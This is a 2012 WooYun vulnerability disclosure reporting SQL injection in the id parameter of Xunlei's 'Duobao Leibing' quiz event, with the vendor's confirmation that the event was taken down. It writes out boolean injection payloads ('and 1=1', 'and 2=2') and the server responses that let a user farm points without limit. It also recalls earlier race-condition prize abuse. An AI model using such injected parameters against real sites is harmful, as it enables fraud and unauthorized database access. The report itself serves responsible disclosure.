漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-011328
漏洞标题:迅雷"夺宝雷兵"疑似注入漏洞
相关厂商:迅雷
漏洞作者: popok
提交时间:2012-08-25 22:52
修复时间:2012-10-09 22:53
公开时间:2012-10-09 22:53
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-08-25: 细节已通知厂商并且等待厂商处理中
2012-08-27: 厂商已经确认,细节仅向厂商公开
2012-09-06: 细节向核心白帽子及相关领域专家公开
2012-09-16: 细节向普通白帽子公开
2012-09-26: 细节向实习白帽子公开
2012-10-09: 细节向公众公开
简要描述:
修改参数,即可无限刷分
详细说明:
id=62&answer=1
其中id是问题编号,answer就是问题答案,1是对,2是错
62号题答案是对,重复提交的话返回
jsonp1345702942308({"errno":-10,"msg":"您已经回答对了,不能再回答了!"});
其中题号貌似没有过滤
提交&id=62 and 2=1&answer=1,返回
jsonp1345702942308({"answer_con":null,"errno":-2,"msg":"回答错误,倒扣1个金币!"});
提交&id=62 and 1=1&answer=1,返回
jsonp1345702942308({"errno":2,"msg":"回答正确,奖励3个金币!"});
再次提交&id=62 and 1=1&answer=1,返回
jsonp1345702942308({"errno":-10,"msg":"您已经回答对了,不能再回答了!"});
换一下,提交&id=62 and 2=2&answer=1,返回
jsonp1345702942308({"errno":2,"msg":"回答正确,奖励3个金币!"});
所以重复提交and 1=1 ,2=2,3=3,......递增上去(或者用or),就可以用一道题无限刷分了。
漏洞证明:
不证明了,此活动很坑爹,满分是210分,前期爆出好多BUG,比如,一道题快速点N下答案,就会加N次分,兑换奖品时快速点N次兑换,就能兑换N个奖品。网上好多淫兑换了十几年VIP。后来有2B举报,然后全部回档了。然后迅雷修改代码,修复了BUG,去掉了VIP月卡奖品。现在本人随便看了下,又发现此漏洞。
负责此活动的程序员奖金应该无望了吧?
修复方案:
别修复了,这么坑爹的活动直接下线算了吧
版权声明:转载请注明来源 popok@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2012-08-27 11:29
厂商回复:
感谢反馈!
最新状态:
2012-08-29:感谢反馈!活动已经下线!我们会加强相关web研发人员的相关安全意识!我们有份礼物献上,请联系xlsec#xunlei.com!再次谢谢